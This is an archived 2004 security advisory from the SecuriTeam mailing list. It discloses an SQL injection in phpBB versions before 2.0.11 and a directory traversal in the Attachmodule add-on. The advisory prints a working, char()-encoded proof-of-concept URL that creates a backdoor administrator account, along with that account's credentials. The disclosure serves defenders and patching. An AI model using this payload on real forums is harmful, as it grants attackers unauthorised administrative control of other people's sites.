Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
Date: 29 Nov 2004 10:54:57 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  phpBB SQL Injection and Attachmodule Add-On Directory Traversal
------------------------------------------------------------------------


SUMMARY

 <http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and 
highly customizable open-source bulletin board package. phpBB has a 
user-friendly interface, simple and straightforward administration panel, 
and helpful FAQ. Based on the powerful PHP server language and your choice 
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the 
ideal free community solution for all web sites."

An SQL injection vulnerability and a directory traversal vulnerabilities 
exist within phpBB and Attach module's code.

DETAILS

Vulnerable Systems:
 * phpBB versions prior to 2.0.11
 * Attachmodule, all versions

Immune Systems:
 * phpBB version 2.0.11

Due to decoding mishandling of the input request a malicious attacker is 
able to inject any type of SQL query to the back-end database server. Upon 
close inspection of the code is became evident that using multiple char() 
functions will fool phpBB and allow insertion of an SQL query.

The following SQL statement will add a user with administrative rights on 
the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password, 
user_level) VALUES ('99999', '1', 'ze3lock', 
'ba3c83348bddf7b368b478ac06d3340e', '1')

And the following login credentials:
username: ze3lock
pass: thepass

Note: This query is assuming that the phpBB user table is called 
'phpbb_users', which comprise most of the sites using phpBB. However, 
sites in which the table's name was changed will not be affected and the 
correct name of the table will have to be discovered before exploitation 
can take place.

The exploit can be run on any site using phpBB without the need to be 
registered. This makes it a prime target for automated scripts that insert 
backdoors in many sites around the web. A proof of concept HTTP query is 
provided below. In order to make it work, an active thread number from the 
forums must be substituted in, but this is relatively trivial to find.

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527

In addition, a directory traversal bug in the Attachmodule allows the user 
to read any file located on the local filesystem of the server running 
phpBB. The main culprit is the 'UPLOAD_DIR' argument which is not properly 
sanitized. This directory represents the directory in which all files 
should be uploaded to and the system accepts any type of character as 
input. An attacker is thus able to overwrite files on the local filesystem 
of the server.

Vendor Status:
Users of this system are highly encouraged to upgade to version 2.0.11 and 
add input validation to the 'UPLOAD_DIR' argument of Attachmodule.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:zee@psybnc.it> Zeelock.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal, SecuriTeam <=
Previous by Date:  [UNIX] phpCMS Cross Site Scripting and Information Disclosure Issues, SecuriTeam
Next by Date:  [NT] MailEnable IMAP Service Remote Buffer Overflow, SecuriTeam
Previous by Thread:  [UNIX] phpCMS Cross Site Scripting and Information Disclosure Issues, SecuriTeam
Next by Thread:  [NT] MailEnable IMAP Service Remote Buffer Overflow, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]